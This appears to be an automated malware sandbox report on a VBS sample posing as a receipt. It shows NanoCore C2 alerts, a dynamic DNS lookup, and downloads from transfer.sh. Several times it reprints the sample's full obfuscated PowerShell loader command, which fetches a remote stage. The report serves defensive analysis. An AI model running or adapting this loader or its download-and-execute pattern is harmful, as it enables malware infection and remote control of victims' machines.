Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49785 -> 194.147.140.20:6700
Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49786 -> 194.147.140.20:6700
Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49787 -> 194.147.140.20:6700
Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49788 -> 194.147.140.20:6700
Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49789 -> 194.147.140.20:6700
Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49790 -> 194.147.140.20:6700
Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49791 -> 194.147.140.20:6700
Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49797 -> 194.147.140.20:6700
Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49803 -> 194.147.140.20:6700
Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49804 -> 194.147.140.20:6700
Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49805 -> 194.147.140.20:6700
Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49806 -> 194.147.140.20:6700
Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49807 -> 194.147.140.20:6700
Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49808 -> 194.147.140.20:6700
Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49809 -> 194.147.140.20:6700
Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49810 -> 194.147.140.20:6700
Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49811 -> 194.147.140.20:6700
Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49812 -> 194.147.140.20:6700
Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49813 -> 194.147.140.20:6700
Uses dynamic DNS servicesShow sources
Source: unknownDNS query: name: newjan.duckdns.org
Source: Joe Sandbox ViewASN Name: PTPEU PTPEU
Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: global trafficHTTP traffic detected: GET /ucAlHz/FGTEFR.txt HTTP/1.1Host: transfer.shConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /K5k7xj/HSJDUIF.txt HTTP/1.1Host: transfer.sh
Source: Joe Sandbox ViewIP Address: 144.76.136.153 144.76.136.153
Source: Joe Sandbox ViewIP Address: 144.76.136.153 144.76.136.153
Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.3:49739 version: TLS 1.0
Source: global trafficTCP traffic: 192.168.2.3:49779 -> 194.147.140.20:6700
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
Source: powershell.exe, 00000003.00000003.262731648.000001E0CB73B000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000003.00000002.427466698.000001E0B358A000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000003.00000002.429174278.000001E0B3711000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000003.00000002.424071374.000001E0B32D1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000003.00000002.429174278.000001E0B3711000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000003.00000002.427466698.000001E0B358A000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000003.00000002.427466698.000001E0B358A000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000003.00000002.427466698.000001E0B358A000.00000004.00000001.sdmpString found in binary or memory: https://transfer.sh
Source: powershell.exe, 00000003.00000002.429174278.000001E0B3711000.00000004.00000001.sdmpString found in binary or memory: https://transfer.sh/K5k7xj/HSJDUIF.txt0
Source: powershell.exe, 00000003.00000002.426813843.000001E0B34DC000.00000004.00000001.sdmpString found in binary or memory: https://transfer.sh/ucAlHz/FGTEFR.txt0
Source: unknownDNS traffic detected: queries for: transfer.sh
Source: global trafficHTTP traffic detected: GET /ucAlHz/FGTEFR.txt HTTP/1.1Host: transfer.shConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /K5k7xj/HSJDUIF.txt HTTP/1.1Host: transfer.sh

E-Banking Fraud:

barindex

System Summary:

barindex
Wscript starts Powershell (via cmd or directly)Show sources
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $SZXDCFVGBHNJSDFGH = 'https://transferH-Hsh/ucAlHz/FGTEFRH-Htxt'.Replace('H-H','.');$SOS='%!-X-!5-X-!!-X-5%-X-!*-X-!7-X-!8-X-!e-X-!a-X-!d-X-!b-X-!!-X-!5-X-!*-X-!7-X-!8-X-!a-X-%0-X-3d-X-%0-X-%7-X-*e-X-!5-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-!5-X-*%-X-!3-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-5!-X-%7-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%7-X-%c-X-%7-X-7!-X-%e-X-57-X-%7-X-%9-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%7-X-%c-X-%7-X-*c-X-!9-X-!5-X-!e-X-%7-X-%9-X-3b-X-0a-X-%!-X-53-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!e-X-!a-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!a-X-!b-X-%0-X-3d-X-%0-X-%7-X-!!-X-!f-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-*1-X-!!-X-53-X-5!-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-!7-X-%7-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%7-X-%c-X-%7-X-57-X-*e-X-!c-X-*f-X-%7-X-%9-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-%7-X-%c-X-%7-X-7%-X-!9-X-*e-X-%7-X-%9-X-3b-X-0a-X-%!-X-53-X-57-X-58-X-!!-X-!5-X-!3-X-5%-X-!*-X-!7-X-59-X-!8-X-55-X-!a-X-!9-X-53-X-!!-X-!*-X-5*-X-!7-X-!8-X-!a-X-%0-X-3d-X-%7-X-!9-X-*0-X-!5-X-58-X-%8-X-*e-X-*0-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-*0-X-*3-X-*0-X-5!-X-%0-X-%!-X-!5-X-!!-X-5%-X-!*-X-!7-X-!8-X-!e-X-!a-X-!d-X-!b-X-!!-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-!7-X-!%-X-!8-X-!e-X-!a-X-53-X-!!-X-!*-X-!7-X-!8-X-%9-X-%7-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%7-X-%c-X-%7-X-*5-X-*0-X-57-X-*0-X-%d-X-!f-X-*%-X-*a-X-*0-X-!5-X-%7-X-%9-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-%7-X-%c-X-%7-X-!5-X-!*-X-!7-X-!8-X-!a-X-%9-X-%e-X-%!-X-53-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!e-X-!a-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!a-X-!b-X-%8-X-%!-X-53-X-5a-X-58-X-!!-X-!3-X-!*-X-5*-X-%7-X-%9-X-3b-X-0a-X-%*-X-%8-X-%7-X-!9-X-%7-X-%b-X-%7-X-!5-X-58-X-%7-X-%9-X-%8-X-%!-X-53-X-57-X-58-X-!!-X-!5-X-!3-X-5%-X-!*-X-!7-X-59-X-!8-X-55-X-!a-X-!9-X-53-X-!!-X-!*-X-5*-X-!7-X-!8-X-!a-X-%0-X-%d-X-!a-X-*f-X-*9-X-*e-X-%0-X-%7-X-%7-X-%9-X-7c-X-%*-X-%8-X-%7-X-!9-X-%7-X-%b-X-%7-X-!5-X-58-X-%7-X-%9-X-3b'.Replace('%','2').Replace('!','4').Replace('
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $SZXDCFVGBHNJSDFGH = 'https://transferH-Hsh/ucAlHz/FGTEFRH-Htxt'.Replace('H-H','.');$SOS='%!-X-!5-X-!!-X-5%-X-!*-X-!7-X-!8-X-!e-X-!a-X-!d-X-!b-X-!!-X-!5-X-!*-X-!7-X-!8-X-!a-X-%0-X-3d-X-%0-X-%7-X-*e-X-!5-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-!5-X-*%-X-!3-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-5!-X-%7-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%7-X-%c-X-%7-X-7!-X-%e-X-57-X-%7-X-%9-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%7-X-%c-X-%7-X-*c-X-!9-X-!5-X-!e-X-%7-X-%9-X-3b-X-0a-X-%!-X-53-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!e-X-!a-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!a-X-!b-X-%0-X-3d-X-%0-X-%7-X-!!-X-!f-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-*1-X-!!-X-53-X-5!-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-!7-X-%7-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%7-X-%c-X-%7-X-57-X-*e-X-!c-X-*f-X-%7-X-%9-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-%7-X-%c-X-%7-X-7%-X-!9-X-*e-X-%7-X-%9-X-3b-X-0a-X-%!-X-53-X-57-X-58-X-!!-X-!5-X-!3-X-5%-X-!*-X-!7-X-59-X-!8-X-55-X-!a-X-!9-X-53-X-!!-X-!*-X-5*-X-!7-X-!8-X-!a-X-%0-X-3d-X-%7-X-!9-X-*0-X-!5-X-58-X-%8-X-*e-X-*0-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-*0-X-*3-X-*0-X-5!-X-%0-X-%!-X-!5-X-!!-X-5%-X-!*-X-!7-X-!8-X-!e-X-!a-X-!d-X-!b-X-!!-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-!7-X-!%-X-!8-X-!e-X-!a-X-53-X-!!-X-!*-X-!7-X-!8-X-%9-X-%7-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%7-X-%c-X-%7-X-*5-X-*0-X-57-X-*0-X-%d-X-!f-X-*%-X-*a-X-*0-X-!5-X-%7-X-%9-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-%7-X-%c-X-%7-X-!5-X-!*-X-!7-X-!8-X-!a-X-%9-X-%e-X-%!-X-53-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!e-X-!a-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!a-X-!b-X-%8-X-%!-X-53-X-5a-X-58-X-!!-X-!3-X-!*-X-5*-X-%7-X-%9-X-3b-X-0a-X-%*-X-%8-X-%7-X-!9-X-%7-X-%b-X-%7-X-!5-X-58-X-%7-X-%9-X-%8-X-%!-X-53-X-57-X-58-X-!!-X-!5-X-!3-X-5%-X-!*-X-!7-X-59-X-!8-X-55-X-!a-X-!9-X-53-X-!!-X-!*-X-5*-X-!7-X-!8-X-!a-X-%0-X-%d-X-!a-X-*f-X-*9-X-*e-X-%0-X-%7-X-%7-X-%9-X-7c-X-%*-X-%8-X-%7-X-!9-X-%7-X-%b-X-%7-X-!5-X-58-X-%7-X-%9-X-3b'.Replace('%','2').Replace('!','4').Replace('Jump to behavior
Very long command line foundShow sources
Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 3047
Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 3047Jump to behavior
Source: 18-ITEMS-RECEIPT.vbs, type: SAMPLEMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: amsi64_6360.amsi.csv, type: OTHERMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000000.00000002.473770924.00000200A3E1A000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000003.00000003.276637155.000001E0B3ED1000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000000.00000002.473686642.00000200A3E0A000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000000.00000002.474801186.00000200A5B40000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000000.00000003.472718525.00000200A3E1D000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000000.00000002.473811647.00000200A3E1E000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000003.00000002.449196823.000001E0B4948000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000000.00000003.471864422.00000200A3E05000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000000.00000002.473965824.00000200A3E3C000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000000.00000003.472493075.00000200A3E19000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000000.00000003.472064698.00000200A3E13000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000000.00000002.474462053.00000200A40B5000.00000004.00000040.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000003.00000002.423333288.000001E0B3230000.00000004.00020000.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000000.00000003.472178505.00000200A3E09000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000000.00000003.472641859.00000200A3E0A000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000000.00000003.470540065.00000200A5B41000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: C:\Users\Public\Run\New.vbs, type: DROPPEDMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 18-ITEMS-RECEIPT.vbsInitial sample: Strings found which are bigger than 50
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\18-ITEMS-RECEIPT.vbs'
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $SZXDCFVGBHNJSDFGH = 'https://transferH-Hsh/ucAlHz/FGTEFRH-Htxt'.Replace('H-H','.');$SOS='%!-X-!5-X-!!-X-5%-X-!*-X-!7-X-!8-X-!e-X-!a-X-!d-X-!b-X-!!-X-!5-X-!*-X-!7-X-!8-X-!a-X-%0-X-3d-X-%0-X-%7-X-*e-X-!5-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-!5-X-*%-X-!3-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-5!-X-%7-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%7-X-%c-X-%7-X-7!-X-%e-X-57-X-%7-X-%9-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%7-X-%c-X-%7-X-*c-X-!9-X-!5-X-!e-X-%7-X-%9-X-3b-X-0a-X-%!-X-53-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!e-X-!a-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!a-X-!b-X-%0-X-3d-X-%0-X-%7-X-!!-X-!f-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-*1-X-!!-X-53-X-5!-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-!7-X-%7-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%7-X-%c-X-%7-X-57-X-*e-X-!c-X-*f-X-%7-X-%9-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-%7-X-%c-X-%7-X-7%-X-!9-X-*e-X-%7-X-%9-X-3b-X-0a-X-%!-X-53-X-57-X-58-X-!!-X-!5-X-!3-X-5%-X-!*-X-!7-X-59-X-!8-X-55-X-!a-X-!9-X-53-X-!!-X-!*-X-5*-X-!7-X-!8-X-!a-X-%0-X-3d-X-%7-X-!9-X-*0-X-!5-X-58-X-%8-X-*e-X-*0-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-*0-X-*3-X-*0-X-5!-X-%0-X-%!-X-!5-X-!!-X-5%-X-!*-X-!7-X-!8-X-!e-X-!a-X-!d-X-!b-X-!!-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-!7-X-!%-X-!8-X-!e-X-!a-X-53-X-!!-X-!*-X-!7-X-!8-X-%9-X-%7-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%7-X-%c-X-%7-X-*5-X-*0-X-57-X-*0-X-%d-X-!f-X-*%-X-*a-X-*0-X-!5-X-%7-X-%9-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-%7-X-%c-X-%7-X-!5-X-!*-X-!7-X-!8-X-!a-X-%9-X-%e-X-%!-X-53-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!e-X-!a-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!a-X-!b-X-%8-X-%!-X-53-X-5a-X-58-X-!!-X-!3-X-!*-X-5*-X-%7-X-%9-X-3b-X-0a-X-%*-X-%8-X-%7-X-!9-X-%7-X-%b-X-%7-X-!5-X-58-X-%7-X-%9-X-%8-X-%!-X-53-X-57-X-58-X-!!-X-!5-X-!3-X-5%-X-!*-X-!7-X-59-X-!8-X-55-X-!a-X-!9-X-53-X-!!-X-!*-X-5*-X-!7-X-!8-X-!a-X-%0-X-%d-X-!a-X-*f-X-*9-X-*e-X-%0-X-%7-X-%7-X-%9-X-7c-X-%*-X-%8-X-%7-X-!9-X-%7-X-%b-X-%7-X-!5-X-58-X-%7-X-